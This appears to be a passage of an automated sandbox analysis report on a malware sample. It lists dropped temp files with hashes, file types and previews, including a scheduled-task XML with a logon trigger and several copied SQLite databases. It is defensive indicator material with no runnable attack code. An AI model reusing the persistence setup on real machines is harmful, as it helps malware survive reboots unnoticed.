                                                                      Preview:LSBIHQFDVTSVVGEDSWPTOHLTEVYTSYUFESYWTQBFWWMHNBBEMBVMOFMZTMOHDQNCKKHKYRTCMCFSQHGYBSVKMOQQLLCPQZHKDOPBFGDVPYZVWAADJMJUDTGESJIJSIQZHWSKSIHTTLYRSZAUESRQOTVVODESFYDOSXVOSTUCUVRNFBAMHCVWDUZQFCHRONJGZADAUMSGTNUNYSJEYNAJVNHGNGEKEHFUHSWMPSTLDYTFLOUMEMBIOUMUQYVMXXUSQSJYMKPGRXNZNRQHYVNDPSJDMHHNJONALSNANDEAVHLRUPZWQZSUYKUNRGQKLVUFPNDCKWWBQHGNPLZWXZSMUEQMMVQATLEMDSGIBYTRQPDWMWCCPYAGXWODOAEXALYTURUVPQJZXUJNOZGFZASLIHIVVBQZYVLEIKGCCPNMMGMIBNZIGEAQZMKNAFRLUXOVVSCZFIZNIPVFFBXOTERXCQGMZIJJKDCRYFXCYFAPTPKLXEFWZKTOELZUOLCVEONVZUAOJTZVWUJWFPFUDVPHTTGKXHDSORYETAETDBZAWMPROUKXLMNPWEGGSTJGSGHJQEGHMKRIVKCSQQGLVWFOIBALTKZNZJKTVRHAUXODFVCAVHPPOMBIWHOJVPZHSRBNBWYKRTOJBZPFGIYJCKLLAKNNAOGERLLVXJLHSWDWQWYHKSOFVCMZYBNMNLGPJOILDGZXVYEWKJBWZQHSWDZWSZLBQIBWYRMMXSCPZOJNGUIEEGKJNLYCUVISYUKUZGGZJDVPNOYOFMAODKVQWRASSESZPGLAOUYYCSGNALLRLRODYFLJIZINLFQABYEGICCVXPUWRNWLWBEOBPSPLAWNUWCLXTGHIRGLZZTTJLXIYMCQWBYXIFLVPGIWZEPOQQLQCCZQTITKAMQMYEMNRHVDWXFLMRDFHDTFKTGYONHYUGKCISPDNCPWHZCRMEJKHTUBTLHNJJVOYIWLKBNFOTHVXQJRGQARLJFNBAJTTVFM

                                                                      C:\Users\user\AppData\Local\Temp\tmp3EC3.tmp

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Roaming\VWGccZGgix.exe
                                                                      File Type:XML 1.0 document, ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):1583
                                                                      Entropy (8bit):5.116948366756834
                                                                      Encrypted:false
                                                                      SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtjH+xvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTTyv
                                                                      MD5:22D047822BA2A06D0C8CCA257E122C85
                                                                      SHA1:EC12B5B3EA1A2D69E500C9C963C9C8370B3CAFAF
                                                                      SHA-256:D4051FBAE814F378F47D44D7C1021A6D4167946CE5767071461554DC7DF6FB15
                                                                      SHA-512:49D1B177CDD726426875BD03115C6EFA438853489FC48BA3C94F309B3F6EA9203D97C8038628C2A2B9E7BDB5C4B4074D58ABAE3CB0FFE77C17ACFEDE9C6C0640
                                                                      Malicious:false
                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                                                      C:\Users\user\AppData\Local\Temp\tmp46C3.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):40960
                                                                      Entropy (8bit):0.8553638852307782
                                                                      Encrypted:false
                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp46C4.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):40960
                                                                      Entropy (8bit):0.8553638852307782
                                                                      Encrypted:false
                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp4A0C.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1373607036346451
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                      MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                      SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                      SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                      SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp4A1C.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1373607036346451
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                      MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                      SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                      SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                      SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp4A3C.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1373607036346451
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                      MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                      SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                      SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                      SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp4A5D.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1373607036346451
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                      MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                      SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                      SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                      SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp4A6D.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1373607036346451
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                      MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                      SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                      SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                      SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp5C8D.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):51200
                                                                      Entropy (8bit):0.8746135976761988
                                                                      Encrypted:false
                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp5C8E.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):51200
                                                                      Entropy (8bit):0.8746135976761988
                                                                      Encrypted:false
                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp5C9F.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):51200
                                                                      Entropy (8bit):0.8746135976761988
                                                                      Encrypted:false
                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp5CAF.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):51200
                                                                      Entropy (8bit):0.8746135976761988
                                                                      Encrypted:false
                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp5CB0.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1209886597424439
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp5CC1.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1209886597424439
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp5CE1.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1209886597424439
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp5CE2.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:dropped
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1209886597424439
                                                                      Encrypted:false
                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                      MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                      SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                      SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                      SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp60C2.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1026
                                                                      Entropy (8bit):4.701188456968639
                                                                      Encrypted:false
                                                                      SSDEEP:24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
                                                                      MD5:18A3248DC9C539CCD2C8419D200F1C4D
                                                                      SHA1:3B2CEE87F3426C4A08959E9861D274663420215C
                                                                      SHA-256:27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
                                                                      SHA-512:F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
                                                                      Malicious:false
                                                                      Preview:GAOBCVIQIJEAUPWDPRZCCBNOLIBVRPPLZPNDXMXWAHTVVUJJRUSFIWRMMSRKOQHCYSYUBMSXZLUDXPNKIPJHNLIKYINEELPXFAGZSNBZUDCHHIXCDHGYSSWPBQTJTTGUSVAKXUCDJBHFKRHEGHIIDQIBNMNBPTCUQXVDKMCQLDDYJEQLPYWFIVRSVCHHZMWWVQSPTEOWKFBQOCSQTIVDEMIEGVVFLVGTQYKHFAQIQIDWGOQCFBYXUBCCAADXTEQWFNWFUUEWWCZWKOPSJAPHFWQQPXLGACJBTIMAPLNZIUQMQYDMTEGLQKPQSZAOUAAZHEFQNKZLRIVEYLQBXOYRAYPVETHTPJWTKBAQMFVCQHILYBXXCIJUSRNECDEBAPQPACKYMONEQAVFVJSLJHMSFLODHAMDEOOQLMHKTRONKXRUSJGZNIPSFDBPUGOOQDGXVUMBHIHMJBJURQUZFOGURXHYACJUXKOHRQKRDYOEUCWNOZMYOMEIECSMGRXADFNSGHNEYHTEUZESWUPBBTWHMAAHATGKEMQJZGUKFHMOPJNWIZHMNPENYBXIYIQQAAAPIDUTGVYULURYREYTCNKILPPERQGQZJOXIUVLLDJBKFXUJTGVBMXJXFCOCDEASKYTKWQYKXJPQPYIMVFTRDRIZGWDHSNPUPGXIZLQHXDLMDNRJWXSZBGUTMSTDCUAYDTGXGFEGTPPNOUDQYIUIRVWYSBPWRTNAHWZOJNZBMFUMOBETTVAJIKGCUOZZNFQXGHJMEETOIEJZISKBKYAFTPYJUBCNCNXVOJQLDZBVOEERMNSHPDRPHBKXUPBSMXTNRSKCXXOGLQOGPAAXIHATAVXMPGBBSIKATHNAZZHCOKHGTBSCMZLDTZSIPNGBQAQVBLOEZNNOCGBGKUDVAVPXMJZWAFTYFQUZALBMQWWTFBKYRIAXMCLPBVGGEVXGVKQOKGLWBYOFWLKNSBXJMTWCKOJNEQGGGMZAEJRHKRITMKM

                                                                      C:\Users\user\AppData\Local\Temp\tmp60D3.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1026
                                                                      Entropy (8bit):4.698193102830694
                                                                      Encrypted:false
                                                                      SSDEEP:24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
                                                                      MD5:78472D7E4F5450A7EA86F47D75E55F39
                                                                      SHA1:D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
                                                                      SHA-256:2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
                                                                      SHA-512:D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
                                                                      Malicious:false
                                                                      Preview:LSBIHQFDVTSVVGEDSWPTOHLTEVYTSYUFESYWTQBFWWMHNBBEMBVMOFMZTMOHDQNCKKHKYRTCMCFSQHGYBSVKMOQQLLCPQZHKDOPBFGDVPYZVWAADJMJUDTGESJIJSIQZHWSKSIHTTLYRSZAUESRQOTVVODESFYDOSXVOSTUCUVRNFBAMHCVWDUZQFCHRONJGZADAUMSGTNUNYSJEYNAJVNHGNGEKEHFUHSWMPSTLDYTFLOUMEMBIOUMUQYVMXXUSQSJYMKPGRXNZNRQHYVNDPSJDMHHNJONALSNANDEAVHLRUPZWQZSUYKUNRGQKLVUFPNDCKWWBQHGNPLZWXZSMUEQMMVQATLEMDSGIBYTRQPDWMWCCPYAGXWODOAEXALYTURUVPQJZXUJNOZGFZASLIHIVVBQZYVLEIKGCCPNMMGMIBNZIGEAQZMKNAFRLUXOVVSCZFIZNIPVFFBXOTERXCQGMZIJJKDCRYFXCYFAPTPKLXEFWZKTOELZUOLCVEONVZUAOJTZVWUJWFPFUDVPHTTGKXHDSORYETAETDBZAWMPROUKXLMNPWEGGSTJGSGHJQEGHMKRIVKCSQQGLVWFOIBALTKZNZJKTVRHAUXODFVCAVHPPOMBIWHOJVPZHSRBNBWYKRTOJBZPFGIYJCKLLAKNNAOGERLLVXJLHSWDWQWYHKSOFVCMZYBNMNLGPJOILDGZXVYEWKJBWZQHSWDZWSZLBQIBWYRMMXSCPZOJNGUIEEGKJNLYCUVISYUKUZGGZJDVPNOYOFMAODKVQWRASSESZPGLAOUYYCSGNALLRLRODYFLJIZINLFQABYEGICCVXPUWRNWLWBEOBPSPLAWNUWCLXTGHIRGLZZTTJLXIYMCQWBYXIFLVPGIWZEPOQQLQCCZQTITKAMQMYEMNRHVDWXFLMRDFHDTFKTGYONHYUGKCISPDNCPWHZCRMEJKHTUBTLHNJJVOYIWLKBNFOTHVXQJRGQARLJFNBAJTTVFM

                                                                      C:\Users\user\AppData\Local\Temp\tmp60D4.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1026
                                                                      Entropy (8bit):4.702263764575455
                                                                      Encrypted:false
                                                                      SSDEEP:24:QUkKzRRr64jMMhcqBDi9yWJqsBFhli3VZ6i0:QUkCe4j/hI9yWJnvi3Vf0
                                                                      MD5:1680F18135FD9FE517865D4B70BCA69F
                                                                      SHA1:CE72CFB81AB690709C2C5BBF40348F829C87813B
                                                                      SHA-256:0F4384BA6CC62588912ACEBE97E6E00A03D1145AFAF38BDE22023CA303B22CA0
